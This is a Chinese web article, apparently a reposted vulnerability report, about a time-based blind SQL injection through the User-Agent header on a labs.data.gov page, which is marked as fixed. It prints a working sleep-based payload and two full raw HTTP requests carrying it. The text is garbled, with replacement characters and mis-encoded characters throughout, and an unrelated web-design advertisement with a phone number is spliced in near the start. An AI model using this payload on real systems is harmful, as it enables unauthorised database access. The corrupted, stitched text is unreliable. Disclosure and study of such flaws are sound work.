如何分析 HTTP頭注入中的User-Agent注入����,很多新手對此不是很清楚���,為了幫助大家解決這個難題�����,下面小編將為大家詳細講解�����,有這方面需求的人可以來學習下����,希望你能有所收獲����。
成都創(chuàng)新互聯(lián)公司從2013年成立,是專業(yè)互聯(lián)網(wǎng)技術服務公司�����,擁有項目成都網(wǎng)站制作、網(wǎng)站建設��、外貿(mào)網(wǎng)站建設網(wǎng)站策劃��,項目實施與項目整合能力�����。我們以讓每一個夢想脫穎而出為使命����,1280元若羌做網(wǎng)站,已為上家服務,為若羌各地企業(yè)和個人服務,聯(lián)系電話:18982081108
漏洞種類:SQL注入
危害等級:嚴重
漏洞狀態(tài):已修復
Harisec在以下網(wǎng)站中發(fā)現(xiàn)一個SQL注入漏洞��,注入的位置在User-Agent�����。
https://labs.data.gov/dashboard/datagov/csv_to_json
例如:將User-Agent的值設置為
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
將導致服務器在25秒后響應
這里����,我們看一下具體的數(shù)據(jù)包內(nèi)容
GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
服務器在25秒后響應,與User-Agent的值相同
將User-Agent的值改一下����,改成9秒后響應
GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
該漏洞可以使攻擊者注入惡意的SQL語句���。
看完上述內(nèi)容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章��,請關注創(chuàng)新互聯(lián)行業(yè)資訊頻道���,感謝您對創(chuàng)新互聯(lián)的支持�。
網(wǎng)頁題目:如何分析HTTP頭注入中的User-Agent注入
分享路徑:
http://weahome.cn/article/jppsjg.html
重慶分公司
重慶分公司
